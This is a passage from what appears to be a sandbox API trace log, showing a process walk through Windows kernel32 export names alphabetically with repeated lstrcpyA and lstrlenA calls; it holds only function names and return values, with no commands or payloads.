[0082.500] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.500] lstrlenA (lpString="BEEP") returned 4 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.500] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.500] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.500] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.500] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.500] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.500] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.500] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.500] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.501] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.501] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.501] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.501] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.501] lstrlenA (lpString="CANCELIO") returned 8 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.501] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.501] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.501] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.501] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.501] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.501] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.501] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.501] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.501] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.501] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.501] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.501] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.501] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.501] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.502] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.502] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.502] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.502] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.502] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.502] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.502] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.502] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.502] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.502] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.502] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.502] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.502] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.502] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.503] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.503] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.503] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.503] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.503] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.503] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.503] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.503] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.503] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.503] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.503] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.503] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.503] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.503] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.503] lstrlenA (lpString="COPYFILEA") returned 9 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.503] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.503] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.503] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.503] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.504] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.504] lstrlenA (lpString="COPYFILEW") returned 9 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.504] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.504] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.504] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.504] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.504] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.504] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.504] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.504] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.504] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.504] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.504] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.504] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.504] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.504] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.504] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.504] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.504] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.505] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.505] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.505] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.512] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.512] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.512] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.512] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.513] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.513] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.513] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.513] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.513] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.513] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.513] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0082.513] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0082.513] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0082.513] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0082.513] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0082.513] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0082.513] lstrlenA (lpString="CREATEJOBSET") returned 12 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0082.513] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0082.513] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0082.513] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0082.513] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0082.513] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0082.513] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0082.514] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0082.514] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0082.514] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0082.514] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0082.514] lstrlenA (lpString="CREATEPIPE") returned 10 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0082.514] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0082.514] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0082.514] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0082.514] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0082.514] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0082.514] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0082.514] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0082.514] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0082.514] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0082.514] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0082.514] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0082.514] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0082.514] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0082.514] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0082.515] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0082.515] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0082.515] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0082.515] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0082.515] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0082.515] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0082.515] lstrcpyA (in: lpString1=0x3f2d1ec, 